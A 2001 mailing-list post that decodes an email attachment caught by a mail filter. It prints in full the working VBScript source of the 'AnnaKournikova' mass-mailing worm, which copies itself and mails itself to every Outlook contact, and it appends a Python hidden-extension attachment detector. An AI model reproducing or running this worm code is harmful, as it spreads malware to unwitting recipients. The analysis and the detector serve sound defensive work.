[Esd-l] Alright, guys, what is this?

Phil Pennock pdp at nl.demon.net
Mon Feb 12 11:09:27 PST 2001


Assuming mail.spconnect.com will let our hub talk to it this time,

On 2001-02-12 at 10:15 -0700, Brett Glass wrote:
> The pattern I've added to John's sanitizer to trap hidden 
> extension exploits just caught this. What is it?

Warning: I'm not a VB person; I do Unix, not Windows.  This is the final
result of my decoding.

Processing:
 * undo quoted-printable
 * change names in function definition, re-indent
 * implement function in perl, move main body over as string, print
   results of decoding
 * change names of various objects, re-indent, decode sequence of Chr()
   calls

It looks like it does pretty much what I've heard these viruses do.
Some "hide from kid-sister" encoding is all.

-----------------------------< cut here >-------------------------------
'Vbs.OnTheFly Created By OnTheFly
On Error Resume Next
Set shell_object = CreateObject("WScript.Shell")
shell_object.regwrite "HKCU\software\OnTheFly\", "Worm made with Vbswg 1.50b"
Set fs_object= Createobject("scripting.filesystemobject")
fs_object.copyfile wscript.scriptfullname,fs_object.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"

if shell_object.regread ("HKCU\software\OnTheFly\mailed") <> "1" then
 do_the_worm_bit()
end if

if month(now) =1 and day(now) =26 then
 shell_object.run "Http://www.dynabyte.nl",3,false
end if

Set txtfile= fs_object.opentextfile(wscript.scriptfullname, 1)
file_contents= txtfile.readall
txtfile.Close

Do
 If Not (fs_object.fileexists(wscript.scriptfullname)) Then
  Set script_file= fs_object.createtextfile(wscript.scriptfullname, True)
  script_file.writefile_contents
  script_file.Close
 End If
Loop

Function do_the_worm_bit()
 On Error Resume Next
 Set outlook_app = CreateObject("Outlook.Application")
 If outlook_app= "Outlook"Then
  Set mapi_space=outlook_app.GetNameSpace("MAPI")
  Set address_lists= mapi_space.AddressLists
  For Each addr_entry In address_lists
   If addr_entry.AddressEntries.Count <> 0 Then
    addr_entry_count = addr_entry.AddressEntries.Count
    For loop_address= 1 To addr_entry_count
     Set new_message = outlook_app.CreateItem(0)
     Set recipient = addr_entry.AddressEntries(loop_address)
     new_message.To = recipient.Address
     new_message.Subject = "Here you have, ;o)"
     new_message.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
     set attachments=new_message.Attachments
     attachments.Add fs_object.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"
     new_message.DeleteAfterSubmit = True
     If new_message.To <> "" Then
      new_message.Send
      shell_object.regwrite "HKCU\software\OnTheFly\mailed", "1"
     End If
    Next
   End If
  Next
 end if
End Function
'Vbswg 1.50b
-----------------------------< cut here >-------------------------------

-- 
Phil Pennock                        <pdp at nl.demon.net> <Phil.Pennock at thus.net>
Demon Internet Nederland -- Network Operations Centre -- Systems Administrator
Libertes philosophica.
NL Sales: +31 20 422 20 00                          NL Support: 0800 33 6666 8
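
An added example, not part of the original post and not the sanitizer's actual pattern: one way a mail filter can flag the hidden-extension attachment name seen in the decoded script ("AnnaKournikova.jpg.vbs"). The two extension sets, the function names and the sample message are assumptions constructed for illustration.

```python
import email
from email import policy
from email.message import EmailMessage

# Final extensions that Windows will execute (illustrative subset, an assumption).
EXECUTABLE = {"vbs", "vbe", "js", "jse", "wsf", "wsh", "hta",
              "scr", "pif", "bat", "cmd", "com", "exe", "lnk"}
# Extensions a recipient reads as harmless content (illustrative subset, an assumption).
DECOY = {"jpg", "jpeg", "gif", "png", "bmp", "txt", "doc",
         "pdf", "mp3", "avi", "mpg", "htm", "html", "zip"}

def hidden_extension(filename):
    """Return (decoy, real) if the name dresses an executable type as content, else None."""
    # Normalise first: Windows ignores trailing dots and spaces in file names.
    name = filename.strip().rstrip(". ").lower()
    parts = [p.strip() for p in name.split(".")]
    if len(parts) < 3:          # need base name + decoy + real extension
        return None
    decoy, real = parts[-2], parts[-1]
    if real in EXECUTABLE and decoy in DECOY:
        return decoy, real
    return None

def scan_message(raw_bytes):
    """Return [(filename, decoy, real)] for every suspicious attachment in a message."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    hits = []
    for part in msg.walk():
        filename = part.get_filename()   # also decodes RFC 2231 encoded names
        if filename:
            found = hidden_extension(filename)
            if found:
                hits.append((filename, *found))
    return hits

def build_sample():
    """Constructed sample shaped like the message the decoded script sends."""
    m = EmailMessage()
    m["Subject"] = "Here you have, ;o)"
    m["To"] = "recipient@example.com"
    m.set_content("Hi:\nCheck This!\n")
    m.add_attachment(b"' placeholder text, not the script\n", maintype="application",
                     subtype="octet-stream", filename="AnnaKournikova.jpg.vbs")
    m.add_attachment(b"\xff\xd8\xff", maintype="image", subtype="jpeg",
                     filename="holiday.jpg")
    return m.as_bytes()

if __name__ == "__main__":
    print(scan_message(build_sample()))
```

A name with a single executable extension (for example "setup.vbs") is deliberately not reported here; that case belongs to a plain executable-attachment rule rather than a hidden-extension one.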


